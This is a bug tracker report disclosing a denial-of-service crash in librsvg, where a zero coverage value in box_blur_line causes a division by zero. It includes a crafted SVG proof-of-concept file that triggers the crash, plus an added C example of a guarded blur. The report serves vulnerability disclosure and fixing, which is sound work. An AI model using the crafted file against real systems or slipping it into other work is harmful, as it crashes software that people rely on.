Denial of Service Vulnerability in Librsvg

Bug #1697283 reported by gnehsoah
Affects: librsvg (Ubuntu)
Status: Confirmed
Importance: Undecided
Assigned to: Unassigned

Bug Description

A SIGFPE is raised in function box_blur_line of rsvg-filter.c when librsvg tries to parse a crafted SVG file.

https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439

if (output >= 0)
    dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage;
}

The coverage could be zero.

testcase.svg

<svg width="100" height="120"
 xmlns="http://www.w3.org/2000/svg"
 xmlns:xlink="http://www.w3.org/1999/xlink">

  <filter id="blurMe">
    <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195 20" />
  </filter>

  <circle cx="50" cy="50" r="50" fill="green"
          filter="url(#blurMe)" />
</svg>
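
The guard this report calls for, as an added example that is not part of the original report and is not librsvg's code: a simplified single-channel box blur in C that keeps the rounding division quoted above but never divides by a zero coverage. The function name, signature, return codes and the choice to pass the row through unchanged for a zero-width window are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical, simplified stand-in for a box blur over one row of
 * single-channel pixels; NOT librsvg's box_blur_line.
 * Returns 0 = blurred, 1 = passed through unchanged, -1 = rejected. */
int box_blur_line_checked(const uint8_t *src, uint8_t *dest, int len, int box_width)
{
    if (src == NULL || dest == NULL || len <= 0 || box_width < 0)
        return -1;
    if (box_width == 0) {
        /* An empty window covers no pixel, so coverage would stay 0.
         * Assumed policy: no blur on this axis, copy the row as is. */
        memcpy(dest, src, (size_t)len);
        return 1;
    }
    long long half = box_width / 2;
    for (int out = 0; out < len; out++) {
        uint64_t ac = 0, coverage = 0;
        /* Sum the pixels of the window that fall inside the row. */
        for (long long k = out - half; k < out - half + box_width; k++) {
            if (k >= 0 && k < len) {
                ac += src[k];
                coverage++;
            }
        }
        if (coverage == 0)   /* defence in depth: never reach the division */
            return -1;
        /* Same rounding division as the line quoted in the report. */
        dest[out] = (uint8_t)((ac + (coverage >> 1)) / coverage);
    }
    return 0;
}

int main(void)
{
    const uint8_t row[5] = {0, 0, 255, 0, 0};   /* constructed sample row */
    uint8_t out[5];
    printf("width 0 -> %d\n", box_blur_line_checked(row, out, 5, 0));
    printf("width 3 -> %d, centre pixel %u\n",
           box_blur_line_checked(row, out, 5, 3), (unsigned)out[2]);
    return 0;
}
```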

gnehsoah (gnehsoah) wrote :

The way to trigger this vulnerability is to use nautilus to open testcase.svg.

Marc Deslauriers (mdeslaur) wrote :

Hi! Can I make this bug, including your test case public?

Thanks!

gnehsoah (gnehsoah) wrote : Re: [Bug 1697283] Re: Denial of Service Vulnerability in Librsvg

Yes, you can.

2017-08-18 20:08 GMT+08:00 Marc Deslauriers <email address hidden>:

> Hi! Can I make this bug, including your test case public?
>
> Thanks!

information type: Private Security → Public Security
Changed in librsvg (Ubuntu):
status: New → Confirmed